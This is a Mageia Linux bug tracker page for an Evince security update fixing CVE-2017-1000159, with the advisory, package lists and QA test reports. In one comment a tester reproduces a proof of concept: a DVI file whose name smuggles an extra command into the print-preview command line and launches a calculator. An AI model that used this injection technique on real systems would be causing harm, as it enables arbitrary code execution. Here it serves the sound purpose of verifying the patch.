Bug 22131 - evince new security issue CVE-2017-1000159
Summary: evince new security issue CVE-2017-1000159
Status: RESOLVED FIXED
Alias: None
Product: Mageia
Classification: Unclassified
Component: Security (show other bugs)
Version: 6
Hardware: All Linux
Priority: Normal major
Target Milestone: ---
Assignee: QA Team
QA Contact: Sec team
URL:
Whiteboard: MGA5TOO MGA6-64-OK MGA5-64-OK mga5-32...
Keywords: advisory, validated_update
Depends on:
Blocks:
 
Reported: 2017-12-05 23:13 CET by David Walser
Modified: 2017-12-17 00:20 CET (History)
6 users (show)

See Also:
Source RPM: evince-3.24.1-1.mga6.src.rpm
CVE:
Status comment:

Attachments
Add an attachment (proposed patch, testcase, etc.)

Description David Walser 2017-12-05 23:13:22 CET 
Ubuntu has issued an advisory on December 4:
https://usn.ubuntu.com/usn/usn-3503-1/

Mageia 5 is also affected.
David Walser 2017-12-05 23:13:30 CET

Whiteboard: (none) => MGA5TOO

Marja Van Waes 2017-12-06 12:49:18 CET

Assignee: bugsquad => gnome
CC: (none) => cvargas, marja11

Comment 1 Cesar Vargas 2017-12-09 05:08:15 CET 
available in updates_testing.available in updates_testing for MGA5 and MGA6
Comment 2 David Walser 2017-12-09 18:11:14 CET 
Advisory:
========================

Updated evince packages fix security vulnerability:

It was discovered that Evince incorrectly handled printing certain DVI files. If
a user were tricked into opening and printing a specially-named DVI file, an
attacker could use this issue to execute arbitrary code (CVE-2017-1000159).

References:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000159
https://usn.ubuntu.com/usn/usn-3503-1/
========================

Updated packages in core/updates_testing:
========================
evince-3.14.2-2.1.mga5
evince-dvi-3.14.2-2.1.mga5
libevdocument3_4-3.14.2-2.1.mga5
libevview3_3-3.14.2-2.1.mga5
libevince-devel-3.14.2-2.1.mga5
libevince-gir3.0-3.14.2-2.1.mga5
evince-3.24.1-2.mga6
evince-dvi-3.24.1-2.mga6
libevdocument3_4-3.24.1-2.mga6
libevview3_3-3.24.1-2.mga6
libevince-devel-3.24.1-2.mga6
libevince-gir3.0-3.24.1-2.mga6

from SRPMS:
evince-3.14.2-2.1.mga5.src.rpm
evince-3.24.1-2.mga6.src.rpm

Assignee: gnome => qa-bugs

Comment 3 Len Lawrence 2017-12-10 16:22:55 CET 
Mageia 6 :: x86_64

https://bugzilla.gnome.org/show_bug.cgi?id=784947
This link provides a possible POC which requires the following procedure, providing all the packages have been installed.

Create the file inclusion.tex -
$ cat inclusion.tex
foo bar baz
\special{psfile=/etc/hosts}
\bye

Run these commands, replacing galculator with any popup application you fancy.
$ dviluatex inclusion.tex
$ cp inclusion.dvi lame.dvi
'inclusion.dvi' -> 'lame.dvi'
$ cp inclusion.dvi 'lame.dvi" -D "galculator'
$ evince 'lame.dvi" -D "galculator'

From the print dialog (under find options) click 'Preview' and see what happens.
Using 'galculator' the calculator does pop up on screen.

Updated the six packages and ran the contrived procedure again.
Both before and after the update there were several lines of diagnostics and it looked like the messages were different.
The upshot is that the evince -> print -> preview sequence failed to launch galculator.

It is highly probable that the change was a result of the patche(s).
Created a sample.tex file; just text with \bye as the last line.
Without that the next command hangs waiting for commandline input (\bye terminates it).

$ dviluatex sample.tex
Output written on sample.dvi (1 page, 556 bytes).

evince is a document viewer which can deal with pdf, postscript, djvu, dvi and "Comic Book Archive" files.
$ evince sample.dvi
This opened the document and displayed the text without any newlines.

$ evince -i 44 sample.pdf
opened the document at page 25 (44 of 172).  Not sure what that means but
$ evince -p 44 sample.pdf
opens the file at page 44.
Navigation with left/right arrow keys.

$ evince -s sample.pdf
opens the document in presentation mode (slides).  Use left/right arrows to advance or go back, Esc to return to normal mode.

$ evince -l tkinter sample.pdf
opened the file at the first page to contain the given phrase, case insensitive.

$ evince ticket.ps
displayed a single page postscript file containing a coloured graph.

$ evince gitmanual.djvu
opened the file as a multiple page document navigable using the arrows, chapter links and by changing the page number field.

This is good for 64 bits.

CC: (none) => tarazed25
Whiteboard: MGA5TOO => MGA5TOO MGA6-64-OK

Comment 4 Len Lawrence 2017-12-10 18:51:46 CET 
Mageia 5 :: x86_64

Following the POC procedure from comment 3 resulted in failure.
evince had trouble with the filename 'lame.dvi" -D "galculator', reported errors and displayed a blank page from print -> preview.
Skipped POC test and updated the packages.

Created a sample.dvi from sample.tex and viewed it in evince.
Exercized evince on various other files in postscript, djvu and pdf formats.
In presentation mode it was possible to follow web links and the URLs appeared in firefox, but were hidden behind the presentation.
No obvious regressions.
Passing this for 64 bits.

Whiteboard: MGA5TOO MGA6-64-OK => MGA5TOO MGA6-64-OK MGA5-64-OK

Comment 5 Brian Rockwell 2017-12-11 06:01:51 CET 
MGA 5 - 32 bit  gnome

Created DVI from a document using latex.  Converted that to a DVI and opened in evince (updated version).

It was able to open the DVI and I scrolled through to the ned and back.  Working as designed.

CC: (none) => brtians1
Whiteboard: MGA5TOO MGA6-64-OK MGA5-64-OK => MGA5TOO MGA6-64-OK MGA5-64-OK mga5-32-ok

Comment 6 Brian Rockwell 2017-12-11 23:42:08 CET 
$ uname -a
Linux localhost 4.9.56-desktop-1.mga6 #1 SMP Thu Oct 12 22:53:48 UTC 2017 i686 i686 i686 GNU/Linux


The following 38 packages are going to be installed:

- cdialog-1.3-1.20160828.1.mga6.i586
- evince-3.24.1-2.mga6.i586
- evince-dvi-3.24.1-2.mga6.i586
- libevdocument3_4-3.24.1-2.mga6.i586
- libevview3_3-3.24.1-2.mga6.i586
- libkpathsea6-20160523-7.mga6.i586
- libnautilus1-3.24.1-1.mga6.i586
- libptexenc1-20160523-7.mga6.i586
- libsynctex1-20160523-7.mga6.i586
- libtexlua5-20160523-7.mga6.i586
- libzziplib0-0.13.62-8.mga6.i586
- perl-Algorithm-Diff-1.190.300-3.mga6.noarch
- perl-CGI-4.280.0-2.mga6.noarch
- perl-File-Copy-Recursive-0.380.0-11.mga6.noarch
- perl-File-HomeDir-1.0.0-9.mga6.noarch
- perl-File-Slurp-Tiny-0.4.0-3.mga6.noarch
- perl-File-Which-1.210.0-2.mga6.noarch
- perl-Font-AFM-1.200.0-7.mga6.noarch
- perl-HTML-Form-6.30.0-7.mga6.noarch
- perl-HTML-Format-2.110.0-5.mga6.noarch
- perl-HTML-Tree-5.30.0-12.mga6.noarch
- perl-HTTP-Server-Simple-0.510.0-3.mga6.noarch
- perl-Sub-Uplevel-0.250.0-3.mga6.noarch
- perl-Test-Warn-0.300.0-6.mga6.noarch
- perl-Tk-804.33.0-4.mga6.i586
- perl-Tree-DAG_Node-1.290.0-2.mga6.noarch
- perl-WWW-Mechanize-1.750.0-3.mga6.noarch
- perl-XML-XPath-1.360.0-2.mga6.noarch
- perl-YAML-Tiny-1.690.0-3.mga6.noarch
- ruby-2.2.8-1.mga6.i586
- ruby-irb-2.2.8-1.mga6.noarch
- ruby-json-1.8.3-3.1.mga6.i586
- ruby-rdoc-4.2.1-1.mga6.noarch
- ruby-RubyGems-2.4.8-7.mga6.noarch
- texlive-20160523-7.mga6.i586
- texlive-collection-basic-20160523-6.mga6.noarch
- texlive-dist-20160523-6.mga6.noarch
- texlive-texmf-20160523-6.mga6.noarch

1.6GB of additional disk space will be used.

816MB of packages will be retrieved.

Is it ok to continue?


Generated a DVI using latex.   Then opened with Evince.

Evince with DVI is one huge download for a mate desktop.

It worked.

Whiteboard: MGA5TOO MGA6-64-OK MGA5-64-OK mga5-32-ok => MGA5TOO MGA6-64-OK MGA5-64-OK mga5-32-ok mga6-32-ok

Comment 7 Len Lawrence 2017-12-12 00:12:27 CET 
Thanks for your tests Brian.  This can now be validated.

CC: (none) => sysadmin-bugs
Keywords: (none) => validated_update

Dave Hodgins 2017-12-15 21:00:33 CET

Keywords: (none) => advisory
CC: (none) => davidwhodgins

Comment 8 Mageia Robot 2017-12-17 00:20:52 CET 
An update for this issue has been pushed to the Mageia Updates repository.

https://advisories.mageia.org/MGASA-2017-0450.html

Resolution: (none) => FIXED
Status: NEW => RESOLVED
Note You need to log in before you can comment on or make changes to this bug.